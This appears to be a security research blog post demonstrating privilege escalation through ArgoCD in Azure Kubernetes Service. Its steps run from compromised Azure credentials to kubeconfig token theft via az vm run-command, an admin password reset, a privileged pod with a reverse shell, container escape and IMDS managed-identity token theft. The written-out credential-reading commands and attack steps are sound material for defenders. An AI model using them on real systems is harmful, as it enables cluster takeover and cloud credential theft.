
In the ever-changing DevOps and cloud-native applications landscape, continuous delivery tools have become essential for managing deployments at scale. Among these tools, ArgoCD has become a popular choice for Kubernetes-native continuous delivery. But as we all know, with great power comes great responsibility, and the security implications of such powerful tools cannot be overlooked.

While ArgoCD streamlines the deployment process and ensures consistency across environments, its default configuration and privileged access patterns can potentially create security vulnerabilities that malicious actors might exploit. This blog post looks at the critical security considerations surrounding ArgoCD deployments, particularly focusing on privilege escalation risks and potential attack vectors in Azure Kubernetes Service (AKS) environments.

Through practical demonstrations and real-world scenarios, we’ll explore how seemingly innocent misconfigurations or compromised credentials can lead to serious security breaches, allowing attackers to gain unauthorized cluster access, manipulate deployments, and potentially access sensitive cloud resources. Understanding these security implications is crucial for organizations implementing ArgoCD in their production environments.

What is ArgoCD?

ArgoCD is a declarative continuous delivery tool for Kubernetes. It can be used as a controller that continuously monitors running applications and compares their current states against their desired target states to deliver needed resources to your clusters.

Excessive Permissions?

By default, when ArgoCD is deployed to a Kubernetes cluster, some of its containers run with a privileged service account attached and cluster-level permissions. If one of them is compromised, an attacker can gain complete control over the cluster, access cloud identity credentials, and move laterally to different environments.

What Are We Going to Demonstrate?



The attacks we present assume a compromised cloud identity (in our case, a compromised user account). They rely on that identity’s permissions in the RBAC (Role-Based Access Control) of Azure Resource Manager (ARM) and in the RBAC of the Kubernetes local accounts on AKS (Azure Kubernetes Service). From there, we show how to access the “ArgoCD” admin interface and escalate our privileges within the Kubernetes cluster, using a different approach from those available online today.

The flow of the attack in a specific Azure environment:

- Execute command on a VM using Azure RBAC permissions.

- Steal the Kubernetes service account token (from <USER HOME PATH>\.kube\config) from the workstation.

- Kubernetes – Enabled AKS local accounts RBAC configuration.

- Modify ArgoCD Kubernetes secrets via Kubernetes RBAC permissions.

- A Kubernetes identity that has permission to ‘patch’/’update’ a specific ArgoCD secret.

- Using ArgoCD secret to deploy a privileged pod for container escape scenario to the hosting Node.

- Accessing Cloud IAM credentials from the hosting Node.

First demo settings:

Azure Cloud Service: Azure Kubernetes Service (AKS)

Kubernetes version: 1.28.9

Kubernetes cluster accessibility (private/public): Public cluster

ArgoCD application – Accessible via a Kubernetes Service of type “LoadBalancer” in the Kubernetes cluster (this is not a pre-condition for the attack).

ArgoCD default admin: enabled.

ArgoCD built-in login access: enabled.

Node OS image – AKSUbuntu-2204gen2containerd-202407.29.0

Steps of Exploitation:

Step 1: Azure Resource Manager – Run Command on VM

Assuming the attacker successfully obtained valid Microsoft Entra ID credentials of either:

- Application credentials.

- Managed Identity credentials – system assigned / user assigned.

- User credentials.

The attacker can now use the Azure Resource Manager permission “Microsoft.Compute/virtualMachines/runCommand/action” to execute code on Azure Virtual Machines, in this case the “billsnapshotmachine” VM in the “billsnapshot” Azure Resource Group in the same Subscription.
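Whether a role actually carries this permission depends on how its action patterns are written, because Azure role definitions accept `*` wildcards and a `notActions` exclusion list. The following is a minimal Python sketch of that check, assuming a simplified role shape (a list of dicts with `actions` and `notActions` keys). The function name `grants_action` and the sample roles are hypothetical, and real evaluation also involves scopes and deny assignments, which are ignored here.

```python
from fnmatch import fnmatchcase

RUN_COMMAND = "Microsoft.Compute/virtualMachines/runCommand/action"


def grants_action(permissions, action):
    """Return True if any permission block allows `action`.

    Each block is a dict with an "actions" list and an optional
    "notActions" list. Patterns may contain `*` wildcards and are
    compared case-insensitively. Scopes and deny assignments are
    deliberately out of scope for this sketch.
    """
    wanted = action.lower()
    for block in permissions:
        allowed = any(fnmatchcase(wanted, p.lower()) for p in block.get("actions", []))
        excluded = any(fnmatchcase(wanted, p.lower()) for p in block.get("notActions", []))
        if allowed and not excluded:
            return True
    return False


# Hypothetical role definitions, for illustration only.
reader_like = [{"actions": ["*/read"], "notActions": []}]
vm_operator_like = [{"actions": ["Microsoft.Compute/virtualMachines/*"], "notActions": []}]
restricted = [{
    "actions": ["Microsoft.Compute/*"],
    "notActions": ["Microsoft.Compute/virtualMachines/runCommand/*"],
}]

for label, role in [("reader-like", reader_like),
                    ("vm-operator-like", vm_operator_like),
                    ("restricted", restricted)]:
    print(label, grants_action(role, RUN_COMMAND))
```

A broad wildcard such as `Microsoft.Compute/virtualMachines/*` is enough to include the run-command action, which is why it is worth reviewing custom roles for patterns like this.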

The user account is allowed to run OS commands on the following Virtual Machine:

Running an OS command, “ls -la /home”, with the obtained user account.

Step 2: Steal the Kubernetes Authentication Credentials from the VM’s .kube/config file



`az vm run-command invoke -g <resource group> -n <name of the machine> --command-id RunShellScript --scripts "cat /home/<username>/.kube/config | grep token:"`

The OS command is executed to retrieve the service account token used for authentication.
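The `grep token:` step works because a kubeconfig that uses token authentication stores the credential on a `token:` line under the user entry. As a rough illustration, the Python sketch below pulls those values out of kubeconfig text with a regular expression. The sample kubeconfig, the user name, and the token value are placeholders invented for this example, and a real tool would parse the YAML properly instead of matching lines.

```python
import re

# Hypothetical kubeconfig fragment; the token is a placeholder, not a real credential.
SAMPLE_KUBECONFIG = """\
apiVersion: v1
kind: Config
users:
- name: argohelper
  user:
    token: eyJhbGciOiJSUzI1NiJ9.EXAMPLE-PAYLOAD.EXAMPLE-SIGNATURE
"""

TOKEN_LINE = re.compile(r"^[ \t]*token:[ \t]*(\S+)[ \t]*$", re.MULTILINE)


def extract_tokens(kubeconfig_text):
    """Return the value of every `token:` line, with surrounding quotes removed."""
    return [m.group(1).strip("'\"") for m in TOKEN_LINE.finditer(kubeconfig_text)]


tokens = extract_tokens(SAMPLE_KUBECONFIG)
print(tokens)
```

The same observation applies defensively: any workstation or VM holding a kubeconfig with a long-lived token is effectively holding a cluster credential in plain text.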

Step 3: Use the Service Account Token via Environment Variable to Authenticate to the Kubernetes Cluster



`az vm run-command invoke -g <resource group> -n <name of the machine> --command-id RunShellScript --scripts "export KUBECONFIG=/home/<username>/.kube/config && kubectl get pods -n argocd"`

The output of listing pods in the ArgoCD namespace through the `az vm run-command` invocation.
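Because the flags in this command are easy to mistype, it can help to assemble the invocation as an argument list. The Python sketch below only builds and prints the command and does not execute anything. The helper name `build_run_command` is hypothetical, and the resource group, machine name, and user name are the same placeholders used in the text.

```python
import shlex


def build_run_command(resource_group, vm_name, script):
    """Return the argv for `az vm run-command invoke` with a shell script."""
    return [
        "az", "vm", "run-command", "invoke",
        "-g", resource_group,
        "-n", vm_name,
        "--command-id", "RunShellScript",
        "--scripts", script,
    ]


script = ("export KUBECONFIG=/home/<username>/.kube/config "
          "&& kubectl get pods -n argocd")
argv = build_run_command("<resource group>", "<name of the machine>", script)

# shlex.join quotes each argument so the line can be pasted into a shell.
print(shlex.join(argv))
```

Passing the script as a single list element keeps the `&&` inside the remote script instead of letting the local shell interpret it.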

Step 4: Enumerate and List Current Roles and Access to our Service Account

Kubernetes RBAC explanation:

ClusterRoles and Roles are Kubernetes entities representing RBAC rule bundles to be applied to Kubernetes identities (subject) upon a scope in the cluster. ClusterRoles can be bound to a specific namespace (RoleBinding) or the entire cluster scope (ClusterRoleBinding), and Roles can be bound to a namespace scope only (RoleBinding).

Roles and ClusterRoles are composed of an array of rules, each having the following properties:

- API groups – an array that has the API group the relevant resources are part of.

- Resources – an array that contains the resource types the rules should be applied upon.

- ResourceNames (optional) – an array that contains resource names to narrow down the resources to be affected by the RBAC rule.

- Verbs – an array of allowed types of access to have on the resource/s, e.g. “get”, “delete”, “create”, “update” and more.

In summary, ClusterRoles are used for cluster-wide access control and permissions, while Roles are used for defining permissions at the namespace level.
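To make the rule structure concrete, here is a simplified Python sketch of how a single RBAC rule can be matched against a request. It is an illustration of the four properties listed above, not the Kubernetes authorizer itself: it ignores non-resource URLs, subresources, and the special handling some verbs receive. The function name `rule_allows` and the sample rule are hypothetical.

```python
def rule_allows(rule, api_group, resource, verb, name=None):
    """Return True if `rule` permits `verb` on `resource` (optionally a named object).

    `rule` is a dict with "apiGroups", "resources", "verbs" and an
    optional "resourceNames" list, mirroring the RBAC rule fields.
    """
    def matches(values, wanted):
        # "*" in a rule field acts as a wildcard for that field.
        return "*" in values or wanted in values

    if not matches(rule.get("apiGroups", []), api_group):
        return False
    if not matches(rule.get("resources", []), resource):
        return False
    if not matches(rule.get("verbs", []), verb):
        return False

    names = rule.get("resourceNames")
    if names:
        # When resourceNames is set, the rule only covers those objects.
        return name is not None and name in names
    return True


# Hypothetical rule: read and patch one specific secret in the core API group.
example_rule = {
    "apiGroups": [""],
    "resources": ["secrets"],
    "resourceNames": ["example-secret"],
    "verbs": ["get", "patch"],
}

print(rule_allows(example_rule, "", "secrets", "patch", "example-secret"))
print(rule_allows(example_rule, "", "secrets", "patch", "other-secret"))
print(rule_allows(example_rule, "", "secrets", "delete", "example-secret"))
```

The scope (namespace or cluster) is not part of the rule. It comes from the binding, which is why the same ClusterRole can grant namespace-level or cluster-level access depending on how it is bound.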



Now that we better understand how Kubernetes RBAC works, let’s enumerate the “argohelper” Kubernetes service account (which we compromised in steps 2–3) and its permissions within the cluster.



Listing Kubernetes namespaces – “ArgoCD” namespace



Listing all the service accounts from the “ArgoCD” namespace.





Listing roleBindings Kubernetes resources in the “ArgoCD” namespace; As can be seen, the “argohelper” Kubernetes service account is a subject in the roleBinding – “patch-secret-binding”, for the “patch-secret-role” Kubernetes Role.



The “patch-secret-role” Role at the namespace “ArgoCD”, enables to “list” and “patch” the secret “ArgoCD-secret” at the same namespace.



The ClusterRole bindings of the cluster with focus on “argohelper-bind” which binds the Kubernetes service account “argohelper” with the “pod-listing-role” ClusterRole.



The “pod-listing-role” ClusterRole, which enables to “list” and “get” Kubernetes pods at cluster scope.

To summarize, the permissions of the service account “argohelper” enable the following:

- Permission to “patch” the “argocd-secret” Kubernetes secret in the “argocd” namespace.

- Permission to “get” and “list” all pods in the cluster scope.
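For readers who cannot see the screenshots, the namespaced part of this setup can be approximated as two manifests. The Python sketch below reconstructs them from the description above and prints them as JSON, which is also valid YAML. The Role and RoleBinding names come from the text, while the namespace of the “argohelper” service account is an assumption, since the text does not state it.

```python
import json

# Reconstructed from the prose description; not copied from the real cluster.
patch_secret_role = {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "Role",
    "metadata": {"name": "patch-secret-role", "namespace": "argocd"},
    "rules": [{
        "apiGroups": [""],                    # core API group, where secrets live
        "resources": ["secrets"],
        "resourceNames": ["argocd-secret"],   # narrows the rule to one secret
        "verbs": ["list", "patch"],
    }],
}

patch_secret_binding = {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "RoleBinding",
    "metadata": {"name": "patch-secret-binding", "namespace": "argocd"},
    "subjects": [{
        "kind": "ServiceAccount",
        "name": "argohelper",
        "namespace": "argocd",                # assumption: not stated in the text
    }],
    "roleRef": {
        "apiGroup": "rbac.authorization.k8s.io",
        "kind": "Role",
        "name": "patch-secret-role",
    },
}

print(json.dumps(patch_secret_role, indent=2))
print(json.dumps(patch_secret_binding, indent=2))
```

A rule this narrow looks harmless in a review, which is the point of the demonstration: a single “patch” verb on one well-chosen secret is enough to start the chain.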

Step 5: Enumerate the Current ArgoCD Containers and Their Service Accounts

In the ArgoCD documentation, when you want to rotate the admin password, you can take either of the two actions:



- List Argo CD’s initial admin password from “ArgoCD-initial-admin-secret” Kubernetes secret of “ArgoCD” namespace. If it hasn’t changed already, you can log in to the admin panel using that decoded password.

Kubernetes secret values are base64 encoded after creation.



- Suppose the first secret doesn’t work since it has already changed, in case you can modify (either by using “patch” or “update” verbs) the “ArgoCD-secret” Kubernetes secret of “ArgoCD” namespace, you can reset the admin password to an arbitrary password; The password value is hashed using bcrypt hashing algorithm, so having permissions to discover it (e.g. via “list” or “get” verbs) is insufficient for being able to determine the admin password.



Listing Kubernetes secrets in the “argocd” namespace.

Getting the current base64-encoded value of the “argocd-initial-admin-secret” Kubernetes secret in the “argocd” namespace.

Getting the current bcrypt hash values from the “argocd-secret” Kubernetes secret in the “argocd” namespace.

Kubernetes service accounts in the “argocd” namespace.
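Base64 is an encoding, not encryption, so anyone who can read a secret can recover its contents. The short Python sketch below decodes the `data` map of a secret. The sample values are invented for the example, and the helper name `decode_secret_data` is hypothetical.

```python
import base64


def decode_secret_data(data):
    """Decode every base64 value in a Kubernetes secret's `data` map."""
    return {key: base64.b64decode(value).decode("utf-8") for key, value in data.items()}


# Invented sample mimicking the shape of an initial admin secret.
example = {"password": base64.b64encode(b"example-initial-password").decode("ascii")}
decoded = decode_secret_data(example)
print(decoded["password"])
```

Decoding the admin password field of the second secret yields only a bcrypt hash string, which is why reading that secret is not enough and write access is what matters.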

Let’s list and observe the RoleBindings that are relevant to the above-mentioned Kubernetes service accounts.



I’d like to focus your attention specifically on the following Kubernetes Roles in the “argocd” namespace:

- “argocd-application-controller”

- “argocd-applicationset-controller”

These are the Roles of the two Kubernetes service accounts that run when ArgoCD is deployed. Looking at the two Role definitions, we can see that “argocd-application-controller” has the same permissions as the built-in “cluster-admin” ClusterRole.



Enumerating the pods on the ArgoCD namespace



Getting the pod “ArgoCD-application-controller-0” from namespace “ArgoCD”, including its “metadata.uid”

Step 6: Patch the “ArgoCD-secret” Secret to Get into the Admin Panel



Since the Kubernetes service account we control – “argohelper”, has the permission to “patch” the “ArgoCD-secret” in the “ArgoCD” namespace, we can patch it to an encrypted and encoded password value of our choice:

Patching the Kubernetes secret to the base64 encoded, bcrypt hashed value of the password – “password123”
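The patch body itself is small. The Python sketch below shows one way it could be assembled, assuming the `admin.password` and `admin.passwordMtime` keys described in the Argo CD password reset guidance. The bcrypt hash is a placeholder that must be generated separately (the Python standard library has no bcrypt implementation), and the helper name `build_admin_password_patch` is hypothetical.

```python
import base64
import json
from datetime import datetime, timezone


def build_admin_password_patch(bcrypt_hash, now=None):
    """Return a merge-patch body that replaces the stored admin password hash.

    Values under `data` must be base64-encoded. The modification time is
    updated alongside the hash, as in the documented reset procedure.
    """
    now = now or datetime.now(timezone.utc)

    def b64(text):
        return base64.b64encode(text.encode("utf-8")).decode("ascii")

    return {
        "data": {
            "admin.password": b64(bcrypt_hash),
            "admin.passwordMtime": b64(now.strftime("%Y-%m-%dT%H:%M:%SZ")),
        }
    }


# Placeholder only: substitute a real bcrypt hash generated with a bcrypt tool.
PLACEHOLDER_HASH = "$2a$10$<bcrypt hash of the new password>"

patch = build_admin_password_patch(PLACEHOLDER_HASH)
print(json.dumps(patch))
```

The resulting JSON is what would be passed as the patch document to `kubectl patch secret`, which needs nothing more than the “patch” verb on that one secret.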

We still need to determine the ArgoCD configurations, for example:

- Admin user enabled: true/false

- Default authentication or SSO authentication.



The above configurations are set in the “argocd-cm” Kubernetes ConfigMap, in the “argocd” namespace:

Getting the “argocd-cm” Kubernetes ConfigMap from the “argocd” namespace. The absence of a “data” property in the file indicates that this is a default installation of ArgoCD.

By default, the admin user is enabled and this setting does not appear in the “argocd-cm” ConfigMap. To determine whether the admin user is disabled, look for the following property in the “argocd-cm” ConfigMap:

- “admin.enabled” with value – “false”

In addition, the “argocd-cm” ConfigMap can define the following settings for ArgoCD:

- Enable/disable the user account

- ArgoCD RBAC based on roles

- Type of authentication – Built-in or SSO

- Creation of API keys / Created API keys data/ Creation settings of API keys



Accessing the ArgoCD admin panel via the relevant LoadBalancer’s IP address

Step 7: Creating a Privileged Pod Using an “ArgoCD Application”





First, the attacker logs in to the ArgoCD admin panel (steps 5 and 6), goes to the “Applications” page, and clicks the “+ NEW APP” button:

Set the ArgoCD Application resource with the source of a remote CI/CD repository (e.g. GitHub) under your control. It should contain a reference to a Deployment that will create instances of a privileged pod.

Definition of the above-mentioned ArgoCD Application, containing a “spec.source.repoURL” directive with the URL of a CI/CD repository under your control.
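Since the definition is only shown as a screenshot, here is a rough Python sketch of the general shape of an ArgoCD Application manifest, printed as JSON (which is also valid YAML). The application name, repository URL, path, and destination namespace are placeholders chosen for this example and are not the values used in the demo.

```python
import json


def build_application(name, repo_url, path, dest_namespace):
    """Return a minimal ArgoCD Application manifest as a dict."""
    return {
        "apiVersion": "argoproj.io/v1alpha1",
        "kind": "Application",
        "metadata": {"name": name, "namespace": "argocd"},
        "spec": {
            "project": "default",
            "source": {
                "repoURL": repo_url,          # the repository ArgoCD will sync from
                "path": path,                 # directory holding the manifests
                "targetRevision": "HEAD",
            },
            "destination": {
                # In-cluster API server address used by ArgoCD for the local cluster.
                "server": "https://kubernetes.default.svc",
                "namespace": dest_namespace,
            },
        },
    }


# All four arguments are placeholders for illustration.
app = build_application(
    name="example-app",
    repo_url="https://github.com/<account>/<repository>.git",
    path="manifests",
    dest_namespace="default",
)
print(json.dumps(app, indent=2))
```

Everything ArgoCD deploys for this Application is applied with the controller's own permissions, so whoever controls `spec.source.repoURL` effectively controls what runs in the destination namespace.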



The YAML definition of the malicious privileged pod we control from our GitHub repository (in our example)



Once our privileged pod has been run, it performs the following:

- An Ubuntu container runs a bash command that opens a reverse shell to another instance under our control, which is listening on TCP port 7777. In our case, the IP address “4.242.16.43” belongs to a Virtual Machine with a public IPv4 address.

In Kubernetes, the Pod settings “hostNetwork”, “hostPID”, and “hostIPC” each take a “true” or “false” value and control whether the Pod shares the corresponding namespaces of the host. They are explained in detail in the article “Bad Pods: Kubernetes Pod Privilege Escalation” by BishopFox.
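To show where these settings live in a pod spec, the Python sketch below walks a spec and reports the fields that make a pod “escapable”. It is a simplified illustration and not a substitute for an admission controller. The function name `risky_settings` is hypothetical, and the sample spec is an approximation of the kind of pod described here, with the container command replaced by a harmless placeholder.

```python
def risky_settings(pod_spec):
    """List host-sharing and privilege settings found in a pod spec dict."""
    findings = []

    # Pod-level flags that share host namespaces.
    for field in ("hostNetwork", "hostPID", "hostIPC"):
        if pod_spec.get(field) is True:
            findings.append(field)

    # Container-level privileged flag.
    for container in pod_spec.get("containers", []):
        context = container.get("securityContext") or {}
        if context.get("privileged") is True:
            findings.append("privileged container: " + container.get("name", "?"))

    # Volumes that expose the node's file system.
    for volume in pod_spec.get("volumes", []):
        if "hostPath" in volume:
            findings.append("hostPath volume: " + volume["hostPath"].get("path", "?"))

    return findings


# Approximation of the pod described in the text; the command is a placeholder.
sample_spec = {
    "hostNetwork": True,
    "hostPID": True,
    "hostIPC": True,
    "containers": [{
        "name": "ubuntu",
        "image": "ubuntu",
        "command": ["sleep", "infinity"],
        "securityContext": {"privileged": True},
        "volumeMounts": [{"name": "host-root", "mountPath": "/host"}],
    }],
    "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}],
}

for finding in risky_settings(sample_spec):
    print(finding)
```

Each finding corresponds to a separate way of reaching the node, so blocking only the privileged flag still leaves the host namespaces and the hostPath mount available.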





While the ArgoCD Application is being built and deployed, the pod is being scheduled and run as well. Then it sends a TCP reverse shell connection to our user-controlled machine (a Virtual Machine in our case), on our listening TCP netcat service:

Receiving the reverse shell connection from the Kubernetes VMSS instance that acts as the Kubernetes Node, to our controlled machine’s listening netcat service on port 7777



“Chrooting” into the “/host” path, which is a mounted hostPath Kubernetes Volume pointing at the host’s root file system. In this case, the “chroot /host” command makes the host’s root file system your root directory, so you effectively operate as root on the Node.

From this point, you can directly access the privileged Kubernetes service account “argocd-application-controller” in the “argocd” namespace.



Using our reverse shell on the host’s file system to list pods and their containers, focusing on the “argocd-application-controller” pod container and enumerating its UID

From this point, we can compromise associated resources of the pods that are scheduled on the same Node. For example, it’s possible to access the mounted projected volumes of the pod that contains the attached Kubernetes service account token in our case.



Exposing the pod’s mounted service account token from the host’s file system
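The pod UID matters because the kubelet organizes pod volumes on the node by UID. The Python sketch below builds the lookup, assuming the common kubelet layout of `/var/lib/kubelet/pods/<pod UID>/volumes/kubernetes.io~projected/<volume name>/token`. The kubelet root directory can differ between distributions, the function name `find_projected_tokens` is hypothetical, and the UID in the usage line is a placeholder.

```python
from pathlib import Path


def find_projected_tokens(pod_uid, kubelet_root="/var/lib/kubelet"):
    """Return paths of service account token files in a pod's projected volumes."""
    base = (Path(kubelet_root) / "pods" / pod_uid
            / "volumes" / "kubernetes.io~projected")
    # Each projected volume gets its own directory; the token file sits inside it.
    return sorted(base.glob("*/token"))


# Placeholder UID; on a node this would be the pod's metadata.uid.
for token_path in find_projected_tokens("<pod uid>"):
    print(token_path)
```

On any machine where that directory does not exist, the function simply returns an empty list. On a node, root access to this tree exposes the tokens of every pod scheduled there, not just the one being targeted.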



Demonstrating that the JWT (JSON Web Token) we obtained belongs to the “argocd-application-controller” service account
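A JWT can be inspected without any key, because its payload is only base64url-encoded JSON. The Python sketch below decodes the payload of a token and reads the `sub` claim, which for service account tokens has the form `system:serviceaccount:<namespace>:<name>`. The sample token is built inside the example with a fake signature, and no signature verification is performed.

```python
import base64
import json


def decode_jwt_payload(token):
    """Decode the payload segment of a JWT without verifying the signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected a token of the form header.payload.signature")
    payload = parts[1]
    payload += "=" * (-len(payload) % 4)   # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))


def _b64url(obj):
    """Encode a dict as unpadded base64url JSON (used to build the sample)."""
    raw = json.dumps(obj).encode("utf-8")
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


# Sample token fabricated for this example; the signature is not real.
sample_token = ".".join([
    _b64url({"alg": "RS256", "typ": "JWT"}),
    _b64url({"sub": "system:serviceaccount:argocd:argocd-application-controller"}),
    "signature-not-checked",
])

claims = decode_jwt_payload(sample_token)
print(claims["sub"])
```

Reading the subject this way is a quick sanity check that the stolen token belongs to the intended identity before it is used against the API server.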



After setting the service account token as our client credential, the `kubectl auth can-i --list` command outputs our compromised service account’s permissions within the cluster scope. These privileges are equivalent to the “cluster-admin” ClusterRole.

Authenticating with a token of the service account “argocd-application-controller”:





Resetting the client credentials to use a service account token: `kubectl config set-credentials argocd-application-controller --token=<k8s service account token>`

Using the following kubectl command to set the service account user credential in our current context: `kubectl config set-context --current --user=argocd-application-controller`
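Under the hood, a token-based client simply sends the token as a bearer credential to the API server. As a hedged illustration, the Python sketch below constructs (but does not send) a request for a `SelfSubjectRulesReview`, the API object that, to our understanding, backs permission listing for the current identity. The API server address and token are placeholders, and the helper name `build_rules_review_request` is hypothetical.

```python
import json
from urllib.request import Request


def build_rules_review_request(api_server, token, namespace):
    """Build a POST request asking the API server what the token may do in a namespace."""
    body = {
        "apiVersion": "authorization.k8s.io/v1",
        "kind": "SelfSubjectRulesReview",
        "spec": {"namespace": namespace},
    }
    url = (api_server.rstrip("/")
           + "/apis/authorization.k8s.io/v1/selfsubjectrulesreviews")
    return Request(
        url=url,
        data=json.dumps(body).encode("utf-8"),
        headers={
            "Authorization": "Bearer " + token,   # the service account token
            "Content-Type": "application/json",
        },
        method="POST",
    )


# Placeholders only; nothing is sent over the network in this sketch.
request = build_rules_review_request(
    "https://<api server address>", "<k8s service account token>", "argocd")
print(request.get_method(), request.full_url)
```

Nothing in the request ties the token to the pod it was issued for, which is why a token read from the node's file system works from anywhere that can reach the API server until it expires.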



In addition to compromising the pod’s attached Kubernetes resources, there is another vector we can leverage in cloud environments: stealing the Node’s Azure Managed Identity via IMDS (Instance Metadata Service), to move laterally and possibly gain more privileges within the Azure environment.

But what happens if you can’t create a privileged pod due to an admission control policy in place to prevent you from deploying an “escapeable” Pod?

The fact is that you don’t have to break out of the container to access the cloud provider’s IMDS. With the `hostNetwork` pod setting set to `true`, the pod shares the node’s network interface and can reach the IMDS without escaping the newly deployed pod:

Reverse shell with the unprivileged pod.

Root on the container level (not the node level).

The token of the managed identity, which has permissions on the Azure Resource Manager (ARM) REST API.
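For reference, the IMDS token request is an ordinary HTTP GET to a link-local address with a mandatory `Metadata: true` header. The Python sketch below builds that request without sending it. The endpoint, API version, and header follow the publicly documented Azure managed identity token endpoint, while the helper name `build_imds_token_request` is hypothetical.

```python
from urllib.parse import urlencode
from urllib.request import Request

IMDS_TOKEN_ENDPOINT = "http://169.254.169.254/metadata/identity/oauth2/token"


def build_imds_token_request(resource="https://management.azure.com/", client_id=None):
    """Build a GET request for a managed identity access token from IMDS."""
    params = {"api-version": "2018-02-01", "resource": resource}
    if client_id:
        # Selects a specific user-assigned identity when several are attached.
        params["client_id"] = client_id
    url = IMDS_TOKEN_ENDPOINT + "?" + urlencode(params)
    # IMDS rejects requests that lack the Metadata header.
    return Request(url, headers={"Metadata": "true"})


# Nothing is sent here; the request object is only inspected.
request = build_imds_token_request()
print(request.get_method(), request.full_url)
```

Because the endpoint is reachable from anything sharing the node's network, restricting pod access to 169.254.169.254 with network policy is a common mitigation for this step.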

Conclusion

In this first part of our series on ArgoCD and hybrid Azure attacks, we examined the security implications surrounding ArgoCD deployments in Azure Kubernetes Service (AKS) environments. We also demonstrated how a compromised cloud identity with specific Azure RBAC permissions can be leveraged to gain unauthorized access to a Kubernetes cluster. By stealing Kubernetes service account tokens and modifying ArgoCD secrets, an attacker can escalate privileges within the cluster and even access sensitive cloud resources.

Through practical examples, we showed how an attacker can execute commands on a virtual machine, enumerate roles and permissions, and ultimately create a privileged pod using an ArgoCD application. This privileged access can then be used to perform a container escape and access the underlying node’s resources, including the node’s Azure Managed Identity.

As we move into the second part of this blog, we’ll explore another critical aspect of Azure Kubernetes security: Azure Kubernetes Workload Identity. We’ll discuss how this feature can be exploited by attackers to move laterally across Azure tenants and assume different Azure principals with elevated permissions.